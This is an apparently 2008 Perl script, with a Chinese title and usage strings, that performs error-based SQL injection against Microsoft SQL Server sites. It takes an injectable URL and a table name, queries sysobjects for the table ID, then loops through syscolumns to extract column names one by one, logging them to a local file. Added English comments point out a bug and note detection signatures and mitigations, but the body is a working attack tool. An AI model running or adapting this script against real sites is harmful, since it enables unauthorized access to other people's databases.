perl在mssql注入中爆表列

#!/usr/bin/perl -w
#Codz By N3tl04D  
#Date 2008-4-13


use strict;
use LWP;

# Argument check: exactly two positional arguments are required (the
# injection URL and the table name); otherwise print usage and exit.
if(@ARGV != 2){
    print "用法:$0 注入点 表名";
    exit;
}

my $browser;            # shared LWP::UserAgent, created lazily inside do_GET
my $start=time();       # wall-clock start; elapsed time is printed at the end
my $talbe=$ARGV[1];     # table name to look up (sic "talbe"; used consistently below)
my $vul=$ARGV[0];       # injectable URL used as the prefix of every request

# Thin GET wrapper around a shared LWP::UserAgent.
#   list context:   ($content, $status_line, $is_success, $response)
#   scalar context: the body on success, undef otherwise
sub do_GET {
    # Build the user agent on first use and keep it for later calls.
    $browser ||= LWP::UserAgent->new;
    my $response = $browser->get(@_);

    if (wantarray) {
        return (
            $response->content,
            $response->status_line,
            $response->is_success,
            $response,
        );
    }

    # Scalar context: nothing unless the request succeeded.
    return $response->is_success ? $response->content : ();
}

# Probe request: appends an AND clause to the injectable URL that queries
# congaltan.dbo.sysobjects for the user table $talbe and compares
# uid > str(id).  NOTE(review): the database name "congaltan" is hard-coded,
# so the request is specific to that one database.
my $tabl="$vul%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))";
my ($content, $status, $is_success) = do_GET($tabl);

# The response body is scraped for "value '...'" -- presumably the text of a
# SQL Server type-conversion error that echoes the object id.  This only
# works when the application returns raw database errors to the client:
# parameterized queries plus generic error pages close the channel, and the
# literal "sysobjects" / "str(id)" fragments in the query string are an easy
# WAF / access-log signature.
if ($content =~ m{value \'(.+?)\'}gi)
    {
        print "得到表ID:$1\n";
  # Append table name and id to the results file (bareword handle, 2-arg
  # open on a literal Windows path).
  open(FILE,">>e:/perl/count.txt") || die ("Could not open file");
  print FILE "===============================================================\n表名:$talbe ID:$1\n";
  close(FILE);
  crake($1);
    } else {
  print "不能爆表\n";
  # BUG: this `last` is not inside any loop, so Perl dies with
  # 'Can't "last" outside a loop block' instead of ending cleanly.
  last;
    }

# Enumerate the column names of the table whose object id is $_[0], one
# request per column: each request asks syscolumns for the top 1 name not
# already in the growing "not in (...)" list.  Hard cap of 470 iterations;
# stops early when the response no longer contains a "value '...'" fragment.
# Same detection / mitigation notes as the probe above -- the repeated
# "syscolumns ... not in(...)" pattern across many requests from one client
# is a strong log signature.
sub crake {
    my @arr1=();            # column names found so far
    for (my $j=1;$j<=470;$j++) {
    print "猜解第$j个表列\n";
    # join returns a scalar, so @arr holds exactly one element; the later
    # interpolation as '@arr' relies on that.
    my @arr=join("','",@arr1);
    my $url="$vul%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=$_[0]%20and%20name%20not%20in('@arr'))";
    
    # List context: $content is returned even when the request failed.
    my ($content, $status, $is_success) = do_GET($url);
    if ($content =~ m{value \'(.+?)\'}gi)
  {
    print "得到表列:$1\n";
    push(@arr1,$1);
    save($1);
  } else {
      print "猜解完成\n";
      last;
  }  
    }
}


# Report elapsed wall-clock time in seconds (crake has already run by the
# time execution reaches here, since it is called from the if block above).
my $end=time();
my $time=$end-$start;
print "用时".$time."秒\n";

# Append one line ("-<value>") to the hard-coded results file
# e:/perl/count.txt.  $_[0] is the value to record.  Uses a bareword handle
# and 2-arg open on a literal path; the handle is closed before returning.
sub save {
  open(FILE1,">>e:/perl/count.txt") || die ("Could not open file");
  print FILE1 "-$_[0]\n";
  close(FILE1);

}

